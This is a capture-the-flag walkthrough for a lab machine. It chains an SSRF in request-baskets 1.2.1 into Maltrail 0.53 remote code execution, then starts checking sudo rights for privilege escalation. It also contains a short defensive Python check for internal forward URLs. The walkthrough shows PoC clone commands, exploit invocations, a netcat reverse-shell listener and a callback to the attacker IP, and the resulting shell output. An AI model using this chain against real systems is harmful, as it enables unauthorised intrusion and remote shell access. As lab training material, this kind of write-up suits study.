Proof of Concept
10.129.20.178
Nmap
PORT STATE SERVICE
22/tcp open ssh
55555/tcp open unknown

Initial Access
After opening the web service at http://10.129.20.178:5555, the page source shows that the "request-baskets 1.2.1" service is in use.
The request-baskets 1.2.1 service has an SSRF vulnerability (CVE-2023-27163).
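A defender's check for the SSRF class described above, added here as an example (not code from this page or from the request-baskets project): it parses basket configurations of the shape request-baskets accepts when a basket is created (the forward_url and proxy_response field names are assumed) and flags any forward URL that would proxy requests into loopback, private or link-local address space, including the IPv4-mapped IPv6 form. The sample configurations are constructed.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed sample basket-configuration bodies, modelled on what a
# request-baskets instance accepts on basket creation (field names assumed).
SAMPLE_BASKET_CONFIGS = [
    '{"forward_url": "http://127.0.0.1:80", "proxy_response": true}',
    '{"forward_url": "http://localhost:8338", "proxy_response": true}',
    '{"forward_url": "http://[::ffff:127.0.0.1]/", "proxy_response": false}',
    '{"forward_url": "https://hooks.example.com/webhook", "proxy_response": false}',
    '{"forward_url": "http://169.254.169.254/latest/meta-data/", "proxy_response": true}',
    '{"forward_url": "", "proxy_response": false}',
]

LOCAL_HOSTNAMES = {"localhost", "localhost.localdomain"}


def is_internal_target(forward_url: str) -> bool:
    """True when the URL's host is loopback, private, link-local or otherwise non-global."""
    if not forward_url:
        return False  # no forwarding configured, nothing to proxy
    host = urlsplit(forward_url).hostname  # lower-cased, brackets and port removed
    if host is None:
        return False
    if host in LOCAL_HOSTNAMES or host.endswith(".localhost"):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolution-time checks are out of scope here
    # ::ffff:127.0.0.1 must be judged as 127.0.0.1, not as a generic IPv6 address
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not addr.is_global


def flag_internal_forwards(bodies):
    """Return the forward URLs from basket configs that would proxy into internal hosts."""
    flagged = []
    for body in bodies:
        cfg = json.loads(body)
        url = cfg.get("forward_url", "")
        if is_internal_target(url):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    for url in flag_internal_forwards(SAMPLE_BASKET_CONFIGS):
        print("internal forward target:", url)
```

The same predicate can be applied server-side to reject such a forward_url at basket-creation time, or run over captured API request bodies to surface existing baskets that point inward.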
Downloaded POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/madhavmehndiratta/CVE-2023-27163.git
Cloning into 'CVE-2023-27163'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.

Use the SSRF vulnerability to generate a URL that reaches port 80, which is only accessible internally.
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ python CVE-2023-27163.py http://10.129.20.178:55555 http://127.0.0.1:80
Creating a proxy basket zbrrhb...
Basket Created!
Accessing the http://10.129.20.178:55555/zbrrhb makes the server request to http://127.0.0.1:80
Authorization Token: CkO85WLROyLkbbAfCgT-2lMqVfdS0W3DFPVliaXIggGI

Port 80, reachable only internally, is found to be running the "maltrail 0.53" service.
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ curl http://10.129.20.178:55555/zbrrhb
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<meta name="robots" content="noindex, nofollow">
<title>Maltrail</title>
<link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
<link rel="stylesheet" type="text/css" href="css/main.css">
<link rel="stylesheet" type="text/css" href="css/media.css">
<script type="text/javascript" src="js/errorhandler.js"></script>
<script type="text/javascript" src="js/thirdparty.min.js"></script>
<script type="text/javascript" src="js/papaparse.min.js"></script>
</head>
<body>
<div id="header_container" class="header noselect">
<div id="logo_container">
<SNIP
<div id="bottom_blank"></div>
<div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>
<ul class="custom-menu">
<li data-action="hide_threat">Hide threat</li>
<li data-action="report_false_positive">Report false positive</li>
</ul>
<script defer type="text/javascript" src="js/main.js"></script>
</body>
</html>

The Maltrail 0.53 service has an RCE vulnerability.
Download the POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/apaz-dev/Maltrail-v0.53-RCE.git
Cloning into 'Maltrail-v0.53-RCE'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 8), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 6.13 KiB | 897.00 KiB/s, done.
Resolving deltas: 100% (8/8), done.

Start an nc reverse-shell listener on port 4444
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Run the POC
┌──(kali㉿kali)-[~/Sau/Maltrail-v0.53-RCE]
└─$ ./exploit.sh -t http://10.129.20.178:55555/zbrrhb -i 10.10.14.17
[*] Start listen from ip 10.10.14.17 on port 4444

Reverse shell connected successfully
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.20.178] 59056
$

Read user.txt
$ cat user.txt
cat user.txt
09fc6f298d333bdfa5448c1a0d37e917
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2937sec preferred_lft 2937sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft forever

Privilege Escalation
Check sudo privileges
puma@sau:~/.gnupg$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Check the /home/puma/.gnupg directory
puma@sau:~/.gnupg$ ls -al
ls -al
total 20
drwx------ 3 puma puma 4096 Apr 15 2023 .
drwxr-xr-x 4 puma puma 4096 Jun 19 2023 ..
drwx------ 2 puma puma 4096 Apr 15 2023 private-keys-v1.d
-rw------- 1 puma puma 32 Apr 15 2023 pubring.kbx
-rw------- 1 puma puma 1200 Apr 15 2023 trustdb.gpg